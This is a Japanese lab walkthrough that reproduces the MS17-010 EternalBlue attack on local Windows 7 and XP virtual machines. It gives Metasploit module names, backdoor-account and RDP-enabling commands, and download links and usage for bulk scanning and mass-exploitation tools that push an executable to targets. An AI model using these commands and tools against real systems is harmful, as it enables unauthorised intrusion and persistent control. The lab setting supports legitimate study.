事の発端#
前回の WannaCry が世界中を席巻してから 1 年以上が経ちましたが、再現することはまだ価値があります。
参考記事:
環境の準備#
- Kali:192.168.2.6
- Win7_SP1:192.168.2.7:デフォルトで Administrator アカウントはパスワードがありません
- WinXP_SP3:192.168.2.4
Metasploit の使用#
モジュールの検索#
Metasploit を使用してスキャンと攻撃を行うために、まず ms17_010 に関するモジュールを確認しましょう:
スキャンモジュールは以下のようになります
auxiliary/admin/smb/ms17_010_command
または以下のモジュールを使用します
auxiliary/scanner/smb/smb_ms17_010
攻撃モジュールはexploit/windows/smb/ms17_010_eternalblue
を使用します
スキャンモジュールを使用してスキャンする#
auxiliary/admin/smb/ms17_010_command
WinXP はスキャンに成功しましたが、Win7 はスキャンできませんでしたので、別のスキャンモジュールを試してみましょう:
auxiliary/scanner/smb/smb_ms17_010
このモジュールでは、2 つのターゲットが攻撃可能と判断されました。
攻撃モジュールを使用して攻撃する#
exploit/windows/smb/ms17_010_eternalblue
ファイアウォールがオンの場合は攻撃できませんが、オフにすると攻撃できます。
ターゲットマシンを制御する#
ここで、シェルで日本語が文字化けする問題について補足します:
chcp 65001
と入力してください
ユーザーの作成と管理者グループへの追加#
net user soapffz adminpasswd /add
net localgroup administrators soapffz /add
リモートデスクトップ機能の有効化#
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
無効化する場合は以下のコマンドを使用します:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
リモートデスクトップ接続#
自分のコンピューターが他のアカウントでログインしている場合、このリモートデスクトップウィンドウは約 20 秒待機し続けます。応答がない場合、管理者アカウントがログアウトされ、デスクトップにアクセスできます:
Windows の検出と攻撃ツール#
EternalBlues バルクスキャンツール#
ダウンロードリンク:http://omerez.com/repository/EternalBlues.exe
現在のコンピューターが存在するローカルネットワーク内のホストに対して ms17_010 の脆弱性をバルクスキャンできます(高速):
MS_17_010_Scanv2.1 スキャンツール#
ダウンロードリンク:https://www.lanzous.com/i359xch
スキャン速度は遅いです:
cping バルクスキャンツール(19-02-23 更新)#
紹介と使用方法の参考記事:内部ネットワーク - 生存ホストのスキャン
k8 強化版 zzz 攻撃ツール(19-02-23 更新)#
内部ネットワークのバルク MS17-010 オーバーフローツール、k8 チームからのもの:https://www.cnblogs.com/k8gege/p/10391101.html
以下のチュートリアルは k8 からの引用です:
ツール:k8強化版zzz
コンパイル:Python
脆弱性:MS17-010
使用方法:
zzz_exploit.exe 192.11.22.82
zzz_exploit.exe 192.11.22.82 exeパラメータ
zzz_exploit.exe 192.11.22.82 exeパラメータ パイプ名
例えば、exeの起動パラメータがm.exe -Startの場合、実戦コマンドはzzz_exploit.exe 192.11.22.82 -Startです。
内部ネットワークのバルク
cpingと組み合わせて内部ネットワークをオーバーフローするため、名前をsmbcheckに変更する必要がありますが、exeは引数なしバージョンを使用する必要があります。(他のツールでもIPパラメータを提供するだけで使用できます)
cpingはIPのみを渡すため、他のパラメータは渡しません。使用する前に任意のexeをma.datに変更する必要があります。
オーバーフローが成功すると、exeがターゲットマシンに自動的に転送され、システム権限でexeプログラムが起動します。
まず、exe プログラムを実行しない場合の効果を試してみましょう:
次に、クラシックな IP レーダーツールをチュートリアルに従って ma.dat に名前を変更してフォルダに配置します:
そして、もう一度試してみましょう:
C:\WINDOWS\Temp\msupdate.exe
に IP レーダーの exe がアップロードされたことがわかりますが、これはバックドアではないため、サービスの起動に失敗しました:
大まかな使い方は以上です。